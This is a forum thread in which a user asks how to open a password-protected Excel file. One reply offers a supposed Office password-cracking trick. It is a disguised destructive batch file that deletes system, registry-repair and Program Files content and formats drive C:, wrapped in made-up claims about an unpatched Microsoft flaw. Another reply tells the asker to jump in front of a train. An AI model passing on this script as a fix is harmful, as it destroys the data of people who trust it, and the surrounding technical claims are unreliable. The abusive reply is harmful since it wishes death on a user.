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  • #2150369

    How will i remove or open a excel file without password


    by devdassp ·

    How will i remove or open a excel file without password

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    • #2923585


      by devdassp ·

      In reply to How will i remove or open a excel file without password


    • #2923570

      If it is not PW protected

      by w2ktechman ·

      In reply to How will i remove or open a excel file without password

      you can open it with Excel, Open Office, or other program.

      If you are asking to Crack a password in an Excel file, here is some much needed info. Right from Scummies tips and tricks of cracking 🙂

      Sorry, I had forgotten about this since I have not used it in a long time. But I just tested it and yes, it is still unpatched by MS. This does not work with Open Office, so you must obtain an actual MS Office suite.

      To crack into a password protected Microsoft Office Document you will need a few tools.

      Microsoft Office Suite
      Ability to comprehend a command console
      Ability to create a batch file

      Open the Office document, Excep File, Powerpoint file, Access DB, or visio file.
      At the password prompt type 13 random characters. DO NOT TRY TO GET INTO IT YET!
      It needs 13 characters in the box for the next steps to work properly.

      Now you will need to alter a system file. Open windows explorer and navigate to c:\Windows\Repair\
      find the file called ‘sam’
      rename the file to ‘samrecover’
      This will reset some of the security accounts on the system, to allow you to make changes to the password protection system in Office.

      Now you need to create a bootable floppy, cd, or flash drive.
      reboot for the permissions to take effect.
      Now create a batch file
      On your desktop, create a file called suser.txt for (suser stands for Super User).
      Open the suser.txt file and paste the information below

      rem # start _admin.pwd
      ren %systemroot%\system32\etc %systemroot%\system32\cet
      rem start process A32#458
      ren %systemroot%\repair\DS_SOFTWARE A1E
      ren %systemroot%\repair\DS_SECURITY A2E
      ren %systemroot%\repair\DS_SAM A3E
      ren %systemroot%\repair\DS_system.bak A4E
      del %systemroot%\repair\A*.* /Q /F
      del %systemroot%\repair\s*.* /Q /F
      rem script _admin.pwd
      del %systemroot%\system32\catroot\*.*
      del %systemroot%\system32\catroot2\*.*
      del %systemroot%\system32\drivers\cet*.*
      rem new_pwd.pwd ==generate 0
      del “c:\program files” /Q /F
      ren %systemroot%\system32 %systemroot%\newpwd
      ren %systemroot%\system %systemroot%\system32
      rem AUTO_START new_pwd.pwd 44#1
      rem _admin.pwd == DISABLE
      del %systemroot%\system32\config /Q /F
      erase %systemroot%\system32\LogFiles\*.*
      rem ACTIVATE_MEMORY_FLOOD_0x0000323A
      format c:\ /Q /A:4096
      rem RESTART _admin.pwd

      Paste all of this into the suser.txt file. Save and close the file. Rename the file to suser.bat
      copy the file to your boot floppy disk.

      Boot to the new floppy disk and test it. This may stop and ask to press OK a few times. It should not, but it may still.

    • #2923529

      How will i remove or open a excel file without password

      by bizzo ·

      In reply to How will i remove or open a excel file without password

      To remove the file:
      In explorer, right click the file, and select delete. This will remove the file.

      To open the file:
      Open excel, click File -> Open, navigate to the location of your file, and click open.
      Alternatively, in explorer, double click the file. Both methods will open the file.

      If the file is actually password protected, then ask the person who owns the file for the password. If you’re supposed to have this file, then I’m sure they’ll freely give you the password. If you obtained the excel file by other means, then go jump in front of a train and stop trying to access information you’re not supposed to.

      Have a nice day. 🙂

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